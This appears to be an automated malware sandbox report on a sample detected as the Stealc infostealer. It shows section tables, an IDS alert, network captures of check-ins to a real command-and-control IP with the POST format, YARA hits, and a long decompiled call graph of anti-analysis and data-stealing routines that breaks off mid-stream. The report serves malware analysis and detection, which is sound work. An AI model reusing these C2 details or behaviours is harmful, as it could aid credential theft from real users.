                                oqzwigwm0x5900000x1a40000x1a32003280e4a57db03400242d0e9a46e5a16cFalse0.9946159456084104data7.953066845220626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                bpeuitit0x7340000x10000x4008cf4daad08f8e74a2dfdf1189a918ae0False0.81640625data6.3463886427381135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x7350000x30000x2200b1c5e8a9b17da08f97b073e9f70b70d9False0.06640625DOS executable (COM)0.8099158379481108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLLImport
                                kernel32.dlllstrcpy
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-29T12:04:12.693723+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 29, 2024 12:04:11.424648046 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:11.430066109 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 12:04:11.430154085 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:11.430305958 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:11.435573101 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 12:04:12.346601963 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 12:04:12.346673965 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:12.402441978 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:12.408056021 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 12:04:12.693645000 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 12:04:12.693722963 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 12:04:16.112713099 CET4970480192.168.2.5185.215.113.206
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 29, 2024 12:04:24.071999073 CET1.1.1.1192.168.2.50x2df6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                Oct 29, 2024 12:04:24.071999073 CET1.1.1.1192.168.2.50x2df6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                • 185.215.113.206
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704185.215.113.206806396C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 29, 2024 12:04:11.430305958 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 29, 2024 12:04:12.346601963 CET203INHTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 11:04:12 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 29, 2024 12:04:12.402441978 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 30 34 32 38 36 45 35 31 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a
                                Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="hwid"9404286E51693196934881------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="build"tale------HCAFIJDGHCBFHJKFCGIE--
                                Oct 29, 2024 12:04:12.693645000 CET210INHTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 11:04:12 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:07:04:05
                                Start date:29/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x700000
                                File size:2'155'008 bytes
                                MD5 hash:345E2A6577340E9722715C9A42736169
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2097264497.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2138292693.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.9%
                                  Total number of Nodes:1330
                                  Total number of Limit Nodes:24
                                  execution_graph 37789 716c90 37834 7022a0 37789->37834 37813 716d04 37814 71acc0 4 API calls 37813->37814 37815 716d0b 37814->37815 37816 71acc0 4 API calls 37815->37816 37817 716d12 37816->37817 37818 71acc0 4 API calls 37817->37818 37819 716d19 37818->37819 37820 71acc0 4 API calls 37819->37820 37821 716d20 37820->37821 37986 71abb0 37821->37986 37823 716dac 37990 716bc0 GetSystemTime 37823->37990 37824 716d29 37824->37823 37826 716d62 OpenEventA 37824->37826 37828 716d95 CloseHandle Sleep 37826->37828 37829 716d79 37826->37829 37831 716daa 37828->37831 37833 716d81 CreateEventA 37829->37833 37831->37824 37832 716db6 CloseHandle ExitProcess 37833->37823 38187 704610 37834->38187 37836 7022b4 37837 704610 2 API calls 37836->37837 37838 7022cd 37837->37838 37839 704610 2 API calls 37838->37839 37840 7022e6 37839->37840 37841 704610 2 API calls 37840->37841 37842 7022ff 37841->37842 37843 704610 2 API calls 37842->37843 37844 702318 37843->37844 37845 704610 2 API calls 37844->37845 37846 702331 37845->37846 37847 704610 2 API calls 37846->37847 37848 70234a 37847->37848 37849 704610 2 API calls 37848->37849 37850 702363 37849->37850 37851 704610 2 API calls 37850->37851 37852 70237c 37851->37852 37853 704610 2 API calls 37852->37853 37854 702395 37853->37854 37855 704610 2 API calls 37854->37855 37856 7023ae 37855->37856 37857 704610 2 API calls 37856->37857 37858 7023c7 37857->37858 37859 704610 2 API calls 37858->37859 37860 7023e0 37859->37860 37861 704610 2 API calls 37860->37861 37862 7023f9 37861->37862 37863 704610 2 API calls 37862->37863 37864 702412 37863->37864 37865 704610 2 API calls 37864->37865 37866 70242b 37865->37866 37867 704610 2 API calls 37866->37867 37868 702444 37867->37868 37869 704610 2 API calls 37868->37869 37870 70245d 37869->37870 37871 704610 2 API calls 37870->37871 37872 702476 37871->37872 37873 704610 2 API calls 37872->37873 37874 70248f 37873->37874 37875 704610 2 API calls 37874->37875 37876 7024a8 37875->37876 37877 704610 2 API calls 37876->37877 37878 7024c1 37877->37878 37879 704610 2 API calls 37878->37879 37880 7024da 37879->37880 37881 704610 2 API calls 37880->37881 37882 7024f3 37881->37882 37883 704610 2 API calls 37882->37883 37884 70250c 37883->37884 37885 704610 2 API calls 37884->37885 37886 702525 37885->37886 37887 704610 2 API calls 37886->37887 37888 70253e 37887->37888 37889 704610 2 API calls 37888->37889 37890 702557 37889->37890 37891 704610 2 API calls 37890->37891 37892 702570 37891->37892 37893 704610 2 API calls 37892->37893 37894 702589 37893->37894 37895 704610 2 API calls 37894->37895 37896 7025a2 37895->37896 37897 704610 2 API calls 37896->37897 37898 7025bb 37897->37898 37899 704610 2 API calls 37898->37899 37900 7025d4 37899->37900 37901 704610 2 API calls 37900->37901 37902 7025ed 37901->37902 37903 704610 2 API calls 37902->37903 37904 702606 37903->37904 37905 704610 2 API calls 37904->37905 37906 70261f 37905->37906 37907 704610 2 API calls 37906->37907 37908 702638 37907->37908 37909 704610 2 API calls 37908->37909 37910 702651 37909->37910 37911 704610 2 API calls 37910->37911 37912 70266a 37911->37912 37913 704610 2 API calls 37912->37913 37914 702683 37913->37914 37915 704610 2 API calls 37914->37915 37916 70269c 37915->37916 37917 704610 2 API calls 37916->37917 37918 7026b5 37917->37918 37919 704610 2 API calls 37918->37919 37920 7026ce 37919->37920 37921 719bb0 37920->37921 38192 719aa0 GetPEB 37921->38192 37923 719bb8 37924 719de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37923->37924 37925 719bca 37923->37925 37926 719e44 GetProcAddress 37924->37926 37927 719e5d 37924->37927 37928 719bdc 21 API calls 37925->37928 37926->37927 37929 719e96 37927->37929 37930 719e66 GetProcAddress GetProcAddress 37927->37930 37928->37924 37931 719eb8 37929->37931 37932 719e9f GetProcAddress 37929->37932 37930->37929 37933 719ec1 GetProcAddress 37931->37933 37934 719ed9 37931->37934 37932->37931 37933->37934 37935 716ca0 37934->37935 37936 719ee2 GetProcAddress GetProcAddress 37934->37936 37937 71aa50 37935->37937 37936->37935 37938 71aa60 37937->37938 37939 716cad 37938->37939 37940 71aa8e lstrcpy 37938->37940 37941 7011d0 37939->37941 37940->37939 37942 7011e8 37941->37942 37943 701217 37942->37943 37944 70120f ExitProcess 37942->37944 37945 701160 GetSystemInfo 37943->37945 37946 701184 37945->37946 37947 70117c ExitProcess 37945->37947 37948 701110 GetCurrentProcess VirtualAllocExNuma 37946->37948 37949 701141 ExitProcess 37948->37949 37950 701149 37948->37950 38193 7010a0 VirtualAlloc 37950->38193 37953 701220 38197 718b40 37953->38197 37956 701249 __aulldiv 37957 70129a 37956->37957 37958 701292 ExitProcess 37956->37958 37959 716a10 GetUserDefaultLangID 37957->37959 37960 716a73 37959->37960 37961 716a32 37959->37961 37967 701190 37960->37967 37961->37960 37962 716a61 ExitProcess 37961->37962 37963 716a43 ExitProcess 37961->37963 37964 716a57 ExitProcess 37961->37964 37965 716a6b ExitProcess 37961->37965 37966 716a4d ExitProcess 37961->37966 37965->37960 37968 717a70 3 API calls 37967->37968 37969 70119e 37968->37969 37970 7011cc 37969->37970 37971 7179e0 3 API calls 37969->37971 37974 7179e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37970->37974 37972 7011b7 37971->37972 37972->37970 37973 7011c4 ExitProcess 37972->37973 37975 716cd0 37974->37975 37976 717a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37975->37976 37977 716ce3 37976->37977 37978 71acc0 37977->37978 38199 71aa20 37978->38199 37980 71acd1 lstrlen 37981 71acf0 37980->37981 37982 71ad28 37981->37982 37984 71ad0a lstrcpy lstrcat 37981->37984 38200 71aab0 37982->38200 37984->37982 37985 71ad34 37985->37813 37987 71abcb 37986->37987 37988 71ac1b 37987->37988 37989 71ac09 lstrcpy 37987->37989 37988->37824 37989->37988 38204 716ac0 37990->38204 37992 716c2e 37993 716c38 sscanf 37992->37993 38233 71ab10 37993->38233 37995 716c4a SystemTimeToFileTime SystemTimeToFileTime 37996 716c80 37995->37996 37997 716c6e 37995->37997 37999 715d60 37996->37999 37997->37996 37998 716c78 ExitProcess 37997->37998 38000 715d6d 37999->38000 38001 71aa50 lstrcpy 38000->38001 38002 715d7e 38001->38002 38235 71ab30 lstrlen 38002->38235 38005 71ab30 2 API calls 38006 715db4 38005->38006 38007 71ab30 2 API calls 38006->38007 38008 715dc4 38007->38008 38239 716680 38008->38239 38011 71ab30 2 API calls 38012 715de3 38011->38012 38013 71ab30 2 API calls 38012->38013 38014 715df0 38013->38014 38015 71ab30 2 API calls 38014->38015 38016 715dfd 38015->38016 38017 71ab30 2 API calls 38016->38017 38018 715e49 38017->38018 38248 7026f0 38018->38248 38026 715f13 38027 716680 lstrcpy 38026->38027 38028 715f25 38027->38028 38029 71aab0 lstrcpy 38028->38029 38030 715f42 38029->38030 38031 71acc0 4 API calls 38030->38031 38032 715f5a 38031->38032 38033 71abb0 lstrcpy 38032->38033 38034 715f66 38033->38034 38035 71acc0 4 API calls 38034->38035 38036 715f8a 38035->38036 38037 71abb0 lstrcpy 38036->38037 38038 715f96 38037->38038 38039 71acc0 4 API calls 38038->38039 38040 715fba 38039->38040 38041 71abb0 lstrcpy 38040->38041 38042 715fc6 38041->38042 38043 71aa50 lstrcpy 38042->38043 38044 715fee 38043->38044 38974 717690 GetWindowsDirectoryA 38044->38974 38047 71aab0 lstrcpy 38048 716008 38047->38048 38984 7048d0 38048->38984 38050 71600e 39129 7119f0 38050->39129 38052 716016 38053 71aa50 lstrcpy 38052->38053 38054 716039 38053->38054 38055 701590 lstrcpy 38054->38055 38056 71604d 38055->38056 39145 7059b0 34 API calls ctype 38056->39145 38058 716053 39146 711280 lstrlen lstrcpy 38058->39146 38060 71605e 38061 71aa50 lstrcpy 38060->38061 38062 716082 38061->38062 38063 701590 lstrcpy 38062->38063 38064 716096 38063->38064 39147 7059b0 34 API calls ctype 38064->39147 38066 71609c 39148 710fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 38066->39148 38068 7160a7 38069 71aa50 lstrcpy 38068->38069 38070 7160c9 38069->38070 38071 701590 lstrcpy 38070->38071 38072 7160dd 38071->38072 39149 7059b0 34 API calls ctype 38072->39149 38074 7160e3 39150 711170 StrCmpCA lstrlen lstrcpy 38074->39150 38076 7160ee 38077 701590 lstrcpy 38076->38077 38078 716105 38077->38078 39151 711c60 115 API calls 38078->39151 38080 71610a 38081 71aa50 lstrcpy 38080->38081 38082 716126 38081->38082 39152 705000 7 API calls 38082->39152 38084 71612b 38085 701590 lstrcpy 38084->38085 38086 7161ab 38085->38086 39153 7108a0 285 API calls 38086->39153 38088 7161b0 38089 71aa50 lstrcpy 38088->38089 38090 7161d6 38089->38090 38091 701590 lstrcpy 38090->38091 38092 7161ea 38091->38092 39154 7059b0 34 API calls ctype 38092->39154 38094 7161f0 39155 7113c0 StrCmpCA lstrlen lstrcpy 38094->39155 38096 7161fb 38097 701590 lstrcpy 38096->38097 38098 71623b 38097->38098 39156 701ec0 59 API calls 38098->39156 38100 716240 38101 716250 38100->38101 38102 7162e2 38100->38102 38104 71aa50 lstrcpy 38101->38104 38103 71aab0 lstrcpy 38102->38103 38105 7162f5 38103->38105 38106 716270 38104->38106 38107 701590 lstrcpy 38105->38107 38108 701590 lstrcpy 38106->38108 38110 716309 38107->38110 38109 716284 38108->38109 39157 7059b0 34 API calls ctype 38109->39157 39160 7059b0 34 API calls ctype 38110->39160 38113 71628a 39158 711520 19 API calls ctype 38113->39158 38114 71630f 39161 7137b0 31 API calls 38114->39161 38117 7162da 38120 71635b 38117->38120 38122 701590 lstrcpy 38117->38122 38118 716295 38119 701590 lstrcpy 38118->38119 38121 7162d5 38119->38121 38124 716380 38120->38124 38127 701590 lstrcpy 38120->38127 39159 714010 67 API calls 38121->39159 38126 716337 38122->38126 38125 7163a5 38124->38125 38128 701590 lstrcpy 38124->38128 38130 7163ca 38125->38130 38135 701590 lstrcpy 38125->38135 39162 714300 57 API calls 2 library calls 38126->39162 38131 71637b 38127->38131 38133 7163a0 38128->38133 38136 7163ef 38130->38136 38137 701590 lstrcpy 38130->38137 39164 7149d0 88 API calls ctype 38131->39164 39165 714e00 61 API calls ctype 38133->39165 38134 71633c 38140 701590 lstrcpy 38134->38140 38141 7163c5 38135->38141 38138 716414 38136->38138 38143 701590 lstrcpy 38136->38143 38142 7163ea 38137->38142 38145 716439 38138->38145 38151 701590 lstrcpy 38138->38151 38144 716356 38140->38144 39166 714fc0 65 API calls 38141->39166 39167 715190 63 API calls ctype 38142->39167 38149 71640f 38143->38149 39163 715350 44 API calls 38144->39163 38147 716460 38145->38147 38152 701590 lstrcpy 38145->38152 38153 716470 38147->38153 38154 716503 38147->38154 39168 707770 107 API calls ctype 38149->39168 38156 716434 38151->38156 38157 716459 38152->38157 38159 71aa50 lstrcpy 38153->38159 38158 71aab0 lstrcpy 38154->38158 39169 7152a0 61 API calls ctype 38156->39169 39170 7191a0 46 API calls ctype 38157->39170 38162 716516 38158->38162 38163 716491 38159->38163 38164 701590 lstrcpy 38162->38164 38165 701590 lstrcpy 38163->38165 38166 71652a 38164->38166 38167 7164a5 38165->38167 39174 7059b0 34 API calls ctype 38166->39174 39171 7059b0 34 API calls ctype 38167->39171 38170 716530 39175 7137b0 31 API calls 38170->39175 38171 7164ab 39172 711520 19 API calls ctype 38171->39172 38174 7164fb 38178 71aab0 lstrcpy 38174->38178 38175 7164b6 38176 701590 lstrcpy 38175->38176 38177 7164f6 38176->38177 39173 714010 67 API calls 38177->39173 38180 71654c 38178->38180 38181 701590 lstrcpy 38180->38181 38182 716560 38181->38182 39176 7059b0 34 API calls ctype 38182->39176 38184 71656c 38186 716588 38184->38186 39177 7168d0 9 API calls ctype 38184->39177 38186->37832 38188 704621 RtlAllocateHeap 38187->38188 38190 704671 VirtualProtect 38188->38190 38190->37836 38192->37923 38195 7010c2 ctype 38193->38195 38194 7010fd 38194->37953 38195->38194 38196 7010e2 VirtualFree 38195->38196 38196->38194 38198 701233 GlobalMemoryStatusEx 38197->38198 38198->37956 38199->37980 38201 71aad2 38200->38201 38202 71aafc 38201->38202 38203 71aaea lstrcpy 38201->38203 38202->37985 38203->38202 38205 71aa50 lstrcpy 38204->38205 38206 716ad3 38205->38206 38207 71acc0 4 API calls 38206->38207 38208 716ae5 38207->38208 38209 71abb0 lstrcpy 38208->38209 38210 716aee 38209->38210 38211 71acc0 4 API calls 38210->38211 38212 716b07 38211->38212 38213 71abb0 lstrcpy 38212->38213 38214 716b10 38213->38214 38215 71acc0 4 API calls 38214->38215 38216 716b2a 38215->38216 38217 71abb0 lstrcpy 38216->38217 38218 716b33 38217->38218 38219 71acc0 4 API calls 38218->38219 38220 716b4c 38219->38220 38221 71abb0 lstrcpy 38220->38221 38222 716b55 38221->38222 38223 71acc0 4 API calls 38222->38223 38224 716b6f 38223->38224 38225 71abb0 lstrcpy 38224->38225 38226 716b78 38225->38226 38227 71acc0 4 API calls 38226->38227 38228 716b93 38227->38228 38229 71abb0 lstrcpy 38228->38229 38230 716b9c 38229->38230 38231 71aab0 lstrcpy 38230->38231 38232 716bb0 38231->38232 38232->37992 38234 71ab22 38233->38234 38234->37995 38236 71ab4f 38235->38236 38237 715da4 38236->38237 38238 71ab8b lstrcpy 38236->38238 38237->38005 38238->38237 38240 71abb0 lstrcpy 38239->38240 38241 716693 38240->38241 38242 71abb0 lstrcpy 38241->38242 38243 7166a5 38242->38243 38244 71abb0 lstrcpy 38243->38244 38245 7166b7 38244->38245 38246 71abb0 lstrcpy 38245->38246 38247 715dd6 38246->38247 38247->38011 38249 704610 2 API calls 38248->38249 38250 702704 38249->38250 38251 704610 2 API calls 38250->38251 38252 702727 38251->38252 38253 704610 2 API calls 38252->38253 38254 702740 38253->38254 38255 704610 2 API calls 38254->38255 38256 702759 38255->38256 38257 704610 2 API calls 38256->38257 38258 702786 38257->38258 38259 704610 2 API calls 38258->38259 38260 70279f 38259->38260 38261 704610 2 API calls 38260->38261 38262 7027b8 38261->38262 38263 704610 2 API calls 38262->38263 38264 7027e5 38263->38264 38265 704610 2 API calls 38264->38265 38266 7027fe 38265->38266 38267 704610 2 API calls 38266->38267 38268 702817 38267->38268 38269 704610 2 API calls 38268->38269 38270 702830 38269->38270 38271 704610 2 API calls 38270->38271 38272 702849 38271->38272 38273 704610 2 API calls 38272->38273 38274 702862 38273->38274 38275 704610 2 API calls 38274->38275 38276 70287b 38275->38276 38277 704610 2 API calls 38276->38277 38278 702894 38277->38278 38279 704610 2 API calls 38278->38279 38280 7028ad 38279->38280 38281 704610 2 API calls 38280->38281 38282 7028c6 38281->38282 38283 704610 2 API calls 38282->38283 38284 7028df 38283->38284 38285 704610 2 API calls 38284->38285 38286 7028f8 38285->38286 38287 704610 2 API calls 38286->38287 38288 702911 38287->38288 38289 704610 2 API calls 38288->38289 38290 70292a 38289->38290 38291 704610 2 API calls 38290->38291 38292 702943 38291->38292 38293 704610 2 API calls 38292->38293 38294 70295c 38293->38294 38295 704610 2 API calls 38294->38295 38296 702975 38295->38296 38297 704610 2 API calls 38296->38297 38298 70298e 38297->38298 38299 704610 2 API calls 38298->38299 38300 7029a7 38299->38300 38301 704610 2 API calls 38300->38301 38302 7029c0 38301->38302 38303 704610 2 API calls 38302->38303 38304 7029d9 38303->38304 38305 704610 2 API calls 38304->38305 38306 7029f2 38305->38306 38307 704610 2 API calls 38306->38307 38308 702a0b 38307->38308 38309 704610 2 API calls 38308->38309 38310 702a24 38309->38310 38311 704610 2 API calls 38310->38311 38312 702a3d 38311->38312 38313 704610 2 API calls 38312->38313 38314 702a56 38313->38314 38315 704610 2 API calls 38314->38315 38316 702a6f 38315->38316 38317 704610 2 API calls 38316->38317 38318 702a88 38317->38318 38319 704610 2 API calls 38318->38319 38320 702aa1 38319->38320 38321 704610 2 API calls 38320->38321 38322 702aba 38321->38322 38323 704610 2 API calls 38322->38323 38324 702ad3 38323->38324 38325 704610 2 API calls 38324->38325 38326 702aec 38325->38326 38327 704610 2 API calls 38326->38327 38328 702b05 38327->38328 38329 704610 2 API calls 38328->38329 38330 702b1e 38329->38330 38331 704610 2 API calls 38330->38331 38332 702b37 38331->38332 38333 704610 2 API calls 38332->38333 38334 702b50 38333->38334 38335 704610 2 API calls 38334->38335 38336 702b69 38335->38336 38337 704610 2 API calls 38336->38337 38338 702b82 38337->38338 38339 704610 2 API calls 38338->38339 38340 702b9b 38339->38340 38341 704610 2 API calls 38340->38341 38342 702bb4 38341->38342 38343 704610 2 API calls 38342->38343 38344 702bcd 38343->38344 38345 704610 2 API calls 38344->38345 38346 702be6 38345->38346 38347 704610 2 API calls 38346->38347 38348 702bff 38347->38348 38349 704610 2 API calls 38348->38349 38350 702c18 38349->38350 38351 704610 2 API calls 38350->38351 38352 702c31 38351->38352 38353 704610 2 API calls 38352->38353 38354 702c4a 38353->38354 38355 704610 2 API calls 38354->38355 38356 702c63 38355->38356 38357 704610 2 API calls 38356->38357 38358 702c7c 38357->38358 38359 704610 2 API calls 38358->38359 38360 702c95 38359->38360 38361 704610 2 API calls 38360->38361 38362 702cae 38361->38362 38363 704610 2 API calls 38362->38363 38364 702cc7 38363->38364 38365 704610 2 API calls 38364->38365 38366 702ce0 38365->38366 38367 704610 2 API calls 38366->38367 38368 702cf9 38367->38368 38369 704610 2 API calls 38368->38369 38370 702d12 38369->38370 38371 704610 2 API calls 38370->38371 38372 702d2b 38371->38372 38373 704610 2 API calls 38372->38373 38374 702d44 38373->38374 38375 704610 2 API calls 38374->38375 38376 702d5d 38375->38376 38377 704610 2 API calls 38376->38377 38378 702d76 38377->38378 38379 704610 2 API calls 38378->38379 38380 702d8f 38379->38380 38381 704610 2 API calls 38380->38381 38382 702da8 38381->38382 38383 704610 2 API calls 38382->38383 38384 702dc1 38383->38384 38385 704610 2 API calls 38384->38385 38386 702dda 38385->38386 38387 704610 2 API calls 38386->38387 38388 702df3 38387->38388 38389 704610 2 API calls 38388->38389 38390 702e0c 38389->38390 38391 704610 2 API calls 38390->38391 38392 702e25 38391->38392 38393 704610 2 API calls 38392->38393 38394 702e3e 38393->38394 38395 704610 2 API calls 38394->38395 38396 702e57 38395->38396 38397 704610 2 API calls 38396->38397 38398 702e70 38397->38398 38399 704610 2 API calls 38398->38399 38400 702e89 38399->38400 38401 704610 2 API calls 38400->38401 38402 702ea2 38401->38402 38403 704610 2 API calls 38402->38403 38404 702ebb 38403->38404 38405 704610 2 API calls 38404->38405 38406 702ed4 38405->38406 38407 704610 2 API calls 38406->38407 38408 702eed 38407->38408 38409 704610 2 API calls 38408->38409 38410 702f06 38409->38410 38411 704610 2 API calls 38410->38411 38412 702f1f 38411->38412 38413 704610 2 API calls 38412->38413 38414 702f38 38413->38414 38415 704610 2 API calls 38414->38415 38416 702f51 38415->38416 38417 704610 2 API calls 38416->38417 38418 702f6a 38417->38418 38419 704610 2 API calls 38418->38419 38420 702f83 38419->38420 38421 704610 2 API calls 38420->38421 38422 702f9c 38421->38422 38423 704610 2 API calls 38422->38423 38424 702fb5 38423->38424 38425 704610 2 API calls 38424->38425 38426 702fce 38425->38426 38427 704610 2 API calls 38426->38427 38428 702fe7 38427->38428 38429 704610 2 API calls 38428->38429 38430 703000 38429->38430 38431 704610 2 API calls 38430->38431 38432 703019 38431->38432 38433 704610 2 API calls 38432->38433 38434 703032 38433->38434 38435 704610 2 API calls 38434->38435 38436 70304b 38435->38436 38437 704610 2 API calls 38436->38437 38438 703064 38437->38438 38439 704610 2 API calls 38438->38439 38440 70307d 38439->38440 38441 704610 2 API calls 38440->38441 38442 703096 38441->38442 38443 704610 2 API calls 38442->38443 38444 7030af 38443->38444 38445 704610 2 API calls 38444->38445 38446 7030c8 38445->38446 38447 704610 2 API calls 38446->38447 38448 7030e1 38447->38448 38449 704610 2 API calls 38448->38449 38450 7030fa 38449->38450 38451 704610 2 API calls 38450->38451 38452 703113 38451->38452 38453 704610 2 API calls 38452->38453 38454 70312c 38453->38454 38455 704610 2 API calls 38454->38455 38456 703145 38455->38456 38457 704610 2 API calls 38456->38457 38458 70315e 38457->38458 38459 704610 2 API calls 38458->38459 38460 703177 38459->38460 38461 704610 2 API calls 38460->38461 38462 703190 38461->38462 38463 704610 2 API calls 38462->38463 38464 7031a9 38463->38464 38465 704610 2 API calls 38464->38465 38466 7031c2 38465->38466 38467 704610 2 API calls 38466->38467 38468 7031db 38467->38468 38469 704610 2 API calls 38468->38469 38470 7031f4 38469->38470 38471 704610 2 API calls 38470->38471 38472 70320d 38471->38472 38473 704610 2 API calls 38472->38473 38474 703226 38473->38474 38475 704610 2 API calls 38474->38475 38476 70323f 38475->38476 38477 704610 2 API calls 38476->38477 38478 703258 38477->38478 38479 704610 2 API calls 38478->38479 38480 703271 38479->38480 38481 704610 2 API calls 38480->38481 38482 70328a 38481->38482 38483 704610 2 API calls 38482->38483 38484 7032a3 38483->38484 38485 704610 2 API calls 38484->38485 38486 7032bc 38485->38486 38487 704610 2 API calls 38486->38487 38488 7032d5 38487->38488 38489 704610 2 API calls 38488->38489 38490 7032ee 38489->38490 38491 704610 2 API calls 38490->38491 38492 703307 38491->38492 38493 704610 2 API calls 38492->38493 38494 703320 38493->38494 38495 704610 2 API calls 38494->38495 38496 703339 38495->38496 38497 704610 2 API calls 38496->38497 38498 703352 38497->38498 38499 704610 2 API calls 38498->38499 38500 70336b 38499->38500 38501 704610 2 API calls 38500->38501 38502 703384 38501->38502 38503 704610 2 API calls 38502->38503 38504 70339d 38503->38504 38505 704610 2 API calls 38504->38505 38506 7033b6 38505->38506 38507 704610 2 API calls 38506->38507 38508 7033cf 38507->38508 38509 704610 2 API calls 38508->38509 38510 7033e8 38509->38510 38511 704610 2 API calls 38510->38511 38512 703401 38511->38512 38513 704610 2 API calls 38512->38513 38514 70341a 38513->38514 38515 704610 2 API calls 38514->38515 38516 703433 38515->38516 38517 704610 2 API calls 38516->38517 38518 70344c 38517->38518 38519 704610 2 API calls 38518->38519 38520 703465 38519->38520 38521 704610 2 API calls 38520->38521 38522 70347e 38521->38522 38523 704610 2 API calls 38522->38523 38524 703497 38523->38524 38525 704610 2 API calls 38524->38525 38526 7034b0 38525->38526 38527 704610 2 API calls 38526->38527 38528 7034c9 38527->38528 38529 704610 2 API calls 38528->38529 38530 7034e2 38529->38530 38531 704610 2 API calls 38530->38531 38532 7034fb 38531->38532 38533 704610 2 API calls 38532->38533 38534 703514 38533->38534 38535 704610 2 API calls 38534->38535 38536 70352d 38535->38536 38537 704610 2 API calls 38536->38537 38538 703546 38537->38538 38539 704610 2 API calls 38538->38539 38540 70355f 38539->38540 38541 704610 2 API calls 38540->38541 38542 703578 38541->38542 38543 704610 2 API calls 38542->38543 38544 703591 38543->38544 38545 704610 2 API calls 38544->38545 38546 7035aa 38545->38546 38547 704610 2 API calls 38546->38547 38548 7035c3 38547->38548 38549 704610 2 API calls 38548->38549 38550 7035dc 38549->38550 38551 704610 2 API calls 38550->38551 38552 7035f5 38551->38552 38553 704610 2 API calls 38552->38553 38554 70360e 38553->38554 38555 704610 2 API calls 38554->38555 38556 703627 38555->38556 38557 704610 2 API calls 38556->38557 38558 703640 38557->38558 38559 704610 2 API calls 38558->38559 38560 703659 38559->38560 38561 704610 2 API calls 38560->38561 38562 